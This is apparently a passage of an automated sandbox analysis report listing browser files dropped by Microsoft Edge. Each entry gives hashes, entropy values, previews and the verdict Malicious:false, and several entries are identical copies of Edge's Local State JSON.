                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.28455721518155
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf3N9+q2PFi23oH+TcwtfrK+IFUtFfsJZmw7fs9VkwOFi23oH+TcwtfrUeLJ:7F9+vdZYeb23FUtKJ/A9V5wZYeb3J
                                                                                                                                                                                                                                                                                                                                                              MD5:DF3A9FB60BC2E4383B24538CF7BBEF4E
                                                                                                                                                                                                                                                                                                                                                              SHA1:44A1679E19F61BFFDB44D08403E9A2DC73ADABC3
                                                                                                                                                                                                                                                                                                                                                              SHA-256:DAC3D2694768D4888769878F40DB759004C405CF2B9ED9E6B683A5836E788B09
                                                                                                                                                                                                                                                                                                                                                              SHA-512:E0960D48AFA6E1F02C3DD4DCE4330CF3D5CE529DC9CF9A44E56B0389C2A5A9FA0F6CCA4B706734A5425BED5BC2CC243E232588C08C5EBF06A792E596AC35F138
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.297 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/02/18-02:16:43.298 134c Recovering log #3.2025/02/18-02:16:43.298 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):753
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.037333775091125
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
                                                                                                                                                                                                                                                                                                                                                              MD5:C5675C35B320A0898802E1ECFD3476E8
                                                                                                                                                                                                                                                                                                                                                              SHA1:B6CA1C2EE1340662A7B495778416988006748327
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.......f-.................__global... .|.&R.................__global... ./....................__global... ..T...................__global... .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.258055603659796
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfA9+q2PFi23oH+TcwtfrzAdIFUtFfySJZmw7fyS9VkwOFi23oH+TcwtfrzILJ:7o9+vdZYeb9FUtVJ/r9V5wZYeb2J
                                                                                                                                                                                                                                                                                                                                                              MD5:B3D1A49575ADC32DD82CE789921D126C
                                                                                                                                                                                                                                                                                                                                                              SHA1:5B7269864706D6409B96B4BFD72630091469DC98
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3A51E395C44F98E733811D7574AEB98251CE3DC01FFCCB333138E9ADF9A958F5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9A13977F7D996184749F459D33D7087E959F019DD184938781D8DC2EFCC0BBE5CDE098CFE40C453D79CE0B04438B452EC162C870E20396DC7276C0DC4FEFF161
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.294 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/02/18-02:16:43.295 134c Recovering log #3.2025/02/18-02:16:43.295 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.258055603659796
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfA9+q2PFi23oH+TcwtfrzAdIFUtFfySJZmw7fyS9VkwOFi23oH+TcwtfrzILJ:7o9+vdZYeb9FUtVJ/r9V5wZYeb2J
                                                                                                                                                                                                                                                                                                                                                              MD5:B3D1A49575ADC32DD82CE789921D126C
                                                                                                                                                                                                                                                                                                                                                              SHA1:5B7269864706D6409B96B4BFD72630091469DC98
                                                                                                                                                                                                                                                                                                                                                              SHA-256:3A51E395C44F98E733811D7574AEB98251CE3DC01FFCCB333138E9ADF9A958F5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9A13977F7D996184749F459D33D7087E959F019DD184938781D8DC2EFCC0BBE5CDE098CFE40C453D79CE0B04438B452EC162C870E20396DC7276C0DC4FEFF161
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:43.294 134c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/02/18-02:16:43.295 134c Recovering log #3.2025/02/18-02:16:43.295 134c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF208b0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF22f63.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF256d0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF319a3.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3759e.TMP (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43978
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.091528782669861
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4k6zUXqgfbcStXLz40PhIUpQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yn/1t3FqfyW0e6kaoZ
                                                                                                                                                                                                                                                                                                                                                              MD5:092A83888EB1AD761669207E06A63E9E
                                                                                                                                                                                                                                                                                                                                                              SHA1:FA584236A279360A8F478B4ED87FB25B73FCAE17
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CCACA07B81A88A2412A9A711802C1C854D653E107A099B63C544795E197121DF
                                                                                                                                                                                                                                                                                                                                                              SHA-512:F45C668874825CC133A5EE248328ABF1117694E14D890A4CEB23BE173BFF3678DC1AB5EA48ACEF7D0D74CF55A63F6D9E214CAF10013ED7821F8AE9276D1B1084
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                                                              Download File
